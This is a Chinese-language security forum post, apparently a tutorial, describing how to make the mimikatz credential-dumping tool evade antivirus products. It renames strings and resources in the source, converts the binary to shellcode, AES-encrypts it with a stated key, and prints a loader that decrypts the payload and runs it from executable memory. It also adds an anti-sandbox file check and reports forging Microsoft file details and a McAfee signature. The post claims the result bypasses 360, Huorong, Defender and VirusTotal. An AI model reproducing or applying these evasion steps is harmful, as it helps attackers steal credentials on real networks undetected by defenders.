安全矩阵

 找回密码
 立即注册
搜索
查看: 1109|回复: 0

峰回路转之mimikatz通杀杀软

[复制链接]

215

主题

215

帖子

701

积分

高级会员

Rank: 4

积分
701
发表于 2023-12-1 21:19:18 | 显示全部楼层 |阅读模式
前言

关于mimikatz,之前有做过一些免杀尝试,但是效果不好,仅仅只能短暂躲避360的查杀,这几天看了很多mimikatz免杀的文章有了一些新的想法,于是再次尝试mimikatz免杀。

整个免杀的过程比较曲折且艰难,先是尝试源码免杀,发现源码免杀比较艰难(mimikatz是一个个非常复杂的项目,想要实现源码免杀,需要不断的定位特征码,然后消除特征,我比较菜,无法通过定位到的特征找到对应的源代码),简易的源码免杀已无法对杀软产生太大的作用,于是做了一些简单的处理后放弃了源码免杀。之前有了解github上有项目可以把exe转换成可执行的shellcode,于是想着尝试利用这个项目把mimikatz转换成shellcode,通过shellcode加载器去执行,这样可能会绕过杀软检测,最后也是实现了不错的免杀效果。

免杀过程

首先进行源码免杀,虽说免杀效果不好,但是处理过的总比不做处理要好一点。下载mimikatz源码,项目地址https://github.com/gentilkiwi/mimikatz,运行mimikatz.sln,需要对vs进行一些修改,右键mimikatz项目名称,选择平台工具集,我的vs是2019,选择2019即可



接着需要安装MFC,在开始界面选择visual Studio Installer运行,点击修改





勾选MFC,其他默认进行安装即可



重新打开mimikatz.sln,右键项目属性修改这几个地方



修改完后保存,右键解决方案,修改配置属性为X64

对mimikatz关键字进行替换把mimikatz替换成mihoutao,大写和小写都进行替换,vs选择编辑-查找和替换-在文件中替换,勾选区分大小写,点全部替换即可





接着对mimikatz作者的信息进行去除,在整个解决方案搜索替换成空即可


替换后为



在mimikatz.c中对mimikatz打开时的输出信息进行修改,修改成你想要的即可,我这里修改后是这样


对mimikaz文件名进行修改,所有的mimikatz命名的文件都修改掉,我修改后是这样子


注意里面有几个.def后缀的文件,修改文件名后,需要在属性-链接器中修改成对应的名称


接着删去mimikatz的资源文件,把.rz和.ico后缀的文件全部删除,删完如下


对mimikatz重新生成,看是否还能正常使用,右键mihoutao(修改后的项目名称)点击重新生成即可,这里一定不要选择重新生成解决方案,否则会编译不成功





运行编译后的程序,抓取hash可以正常使用,源码简单处理完成。



使用项目https://github.com/hasherezade/pe_to_shellcode,把编译后的程序转换成可执行的shellcode,用法:命令行输入pe2shc.exe mihoutao.exe 1.bin,得到shellcode。对shellcode进行处理,还是使用aes加密,把aes加密后的16进制字符串保存到encrypted.txt中。接着就是要写一个loader来对encrypted.txt中的shellcode进行解密并执行。

解密和加密使用的模式和key要保持一致,我使用的ECB模式,key设置为1234567812345678
  1. <div>
  2. </div><div>// ... decrypt函数 ...</div><div>int decrypt(unsigned char* ciphertext, int ciphertext_len, unsigned char* key,</div><div>    unsigned char* plaintext) {</div><div>    EVP_CIPHER_CTX* ctx;</div><div>    int len;</div><div>    int plaintext_len;</div><div>
  3. </div><div>    // 创建并初始化解密上下文</div><div>    if (!(ctx = EVP_CIPHER_CTX_new())) handleErrors();</div><div>
  4. </div><div>    // 初始化解密操作</div><div>    if (1 != EVP_DecryptInit_ex(ctx, EVP_aes_128_ecb(), NULL, key, NULL))</div><div>        handleErrors();</div><div>
  5. </div><div>    // 提供要解密的消息,并获取明文输出</div><div>    if (1 != EVP_DecryptUpdate(ctx, plaintext, &len, ciphertext, ciphertext_len))</div><div>        handleErrors();</div><div>    plaintext_len = len;</div><div>
  6. </div><div>    // 完成解密过程</div><div>    if (1 != EVP_DecryptFinal_ex(ctx, plaintext + len, &len)) handleErrors();</div><div>    plaintext_len += len;</div><div>
  7. </div><div>    // 清理</div><div>    EVP_CIPHER_CTX_free(ctx);</div><div>
  8. </div><div>    return plaintext_len;</div><div>}</div>
复制代码


这里我把encrypted.txt放到项目目录下,通过资源加载的方式对shellcode进行读取,右键资源文件把encrypted.txt加载进来,文件类型TEXT保存即可



需要对资源文件进行修改,打开resource.h,添加#define IDR_ENCRYPTED_TEXT 101



rz文件中检查是否存在这一行,IDR_TEXT1               TEXT                    "encrypted.txt",没有就添加好



读取资源文件的代码

// 读取资源文件
    HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(IDR_ENCRYPTED_TEXT), TEXT("TEXT"));
    if (hRes == NULL) {

        // 处理错误
        return 1;
    }
    HGLOBAL hData = LoadResource(NULL, hRes);
    if (hData == NULL) {

        // 处理错误
        return 1;
    }
    char* data = (char*)LockResource(hData);
    DWORD dataSize = SizeofResource(NULL, hRes);

    // 请确保资源数据是以NULL结尾的字符串
    char* hex_encrypted_shellcode = (char*)malloc(dataSize + 1);
    if (hex_encrypted_shellcode == NULL) {

        perror("malloc");
        return 1;
    }
    memcpy(hex_encrypted_shellcode, data, dataSize);
    hex_encrypted_shellcode[dataSize] = '\0';

解密shellcode并执行

  1. // 计算十六进制字符串表示的shellcode的长度
  2.     size_t hex_shellcode_len = strlen(hex_encrypted_shellcode);
  3.     // 分配内存以存储二进制形式的shellcode
  4.     size_t bin_shellcode_len = hex_shellcode_len / 2;
  5.     unsigned char* bin_encrypted_shellcode = (unsigned char*)malloc(bin_shellcode_len);
  6.     if (bin_encrypted_shellcode == NULL) {

  7.         perror("malloc");
  8.         free(hex_encrypted_shellcode);
  9.         return 1;
  10.     }

  11.     // 将十六进制字符串转换为二进制数据
  12.     hex_to_bin(hex_encrypted_shellcode, bin_encrypted_shellcode, bin_shellcode_len);

  13.     // 分配内存以存储解密后的shellcode
  14.     unsigned char* decrypted_shellcode = (unsigned char*)malloc(bin_shellcode_len); // 使用原始长度
  15.     if (decrypted_shellcode == NULL) {

  16.         perror("malloc");
  17.         free(bin_encrypted_shellcode);
  18.         free(hex_encrypted_shellcode);
  19.         return 1;
  20.     }

  21.     // 解密shellcode
  22.     int decrypted_len = decrypt(bin_encrypted_shellcode, bin_shellcode_len, key, decrypted_shellcode);
  23.     if (decrypted_len == -1) {

  24.         // 解密失败,处理错误
  25.         handleErrors();
  26.         // 清理代码应该在 handleErrors 之前或之后(如果 handleErrors 不退出)
  27.     }


  28.     // 分配可执行内存
  29.     void* exec = VirtualAlloc(0, decrypted_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  30.     if (exec == NULL) {
  31.         perror("VirtualAlloc");
  32.         free(decrypted_shellcode);
  33.         free(bin_encrypted_shellcode);
  34.         return 1;
  35.     }
  36.     memcpy(exec, decrypted_shellcode, decrypted_len);

  37.     // 转换为函数指针并执行
  38.     void (*func)() = (void (*)())exec;
  39.     func();
复制代码

然后再添加反沙箱代码

  1. // 获取可执行文件的完整路径
  2.     if (GetModuleFileName(NULL, exePath, MAX_PATH) == 0) {
  3.         // 处理错误
  4.         perror("GetModuleFileName failed");
  5.         return 1;
  6.     }

  7.     // 从可执行文件路径中移除文件名,只留下目录
  8.     PathRemoveFileSpec(exePath);

  9.     // 构建1.txt文件的完整路径
  10.     PathCombine(filePath, exePath, "1.txt");

  11.     // 检查文件是否存在
  12.     attributes = GetFileAttributes(filePath);
  13.     if (attributes == INVALID_FILE_ATTRIBUTES) {
  14.         // 文件不存在或发生错误
  15.         perror("GetFileAttributes failed");
  16.         return 1; // 或者你可以根据需要进行其他处理
  17.     }
复制代码

这样一个aes解密的loader就完成了,对代码进行编译测试免杀效果,这个时候我遇到一个问题,编译后的exe在defender环境疯狂查杀,一开始我以为是我代码的问题,于是我对关键代码进行注释,一步步排查问题,我把所有函数都注释完了进行编译仍然报毒被杀,这让我百思不得其解,然后我突然想要是不是我这个项目名称的问题,我一开始的项目名称是mimikatz_loader,所以我进入这个项目的文件夹,发现果然存在好几个mimikatz命名的文件,这可能就是defender查杀我的原因



所以我新建了一个项目,重新编译了一下,再次放进defender环境,果然不杀了。所以一定不要用mimikatz作为项目名称,否则就会被杀软认定为恶意程序。这个时候虽然过了静态查杀,但是又出现了另一个问题,我的程序运行之后并没有弹出mimikatz的窗口,弹不出命令行说明无法执行命令,意味着这个loader写的没有意义,这个问题我想了一晚上突然茅塞顿开,想要了一个导致这个问题的原因,那就是我创建的项目是windows桌面应用,而mimikatz是一个命令行工具。在我把程序调整成控制台应用再次编译执行,发现成功弹出mimikatz的命令行,问题解决。最后对mihoutao添加微软的详细信息和McAfee的签名,如下




免杀完成!

免杀效果

360核晶防护环境



火绒环境


defender环境



VT和微步云沙箱测试结果





总结

1.在mimikatz免杀项目中,不要使用mimikatz来对文件或项目命名,否则会碰到杀软的无情查杀。
2.mimikatz本质上是一个命令行工具,创建vs项目要选择控制台应用,这是一个血淋淋的教训,切记切记。
3.AES算法用来做免杀loader非常不错,建议都去尝试下。




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 01:52 , Processed in 0.013020 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表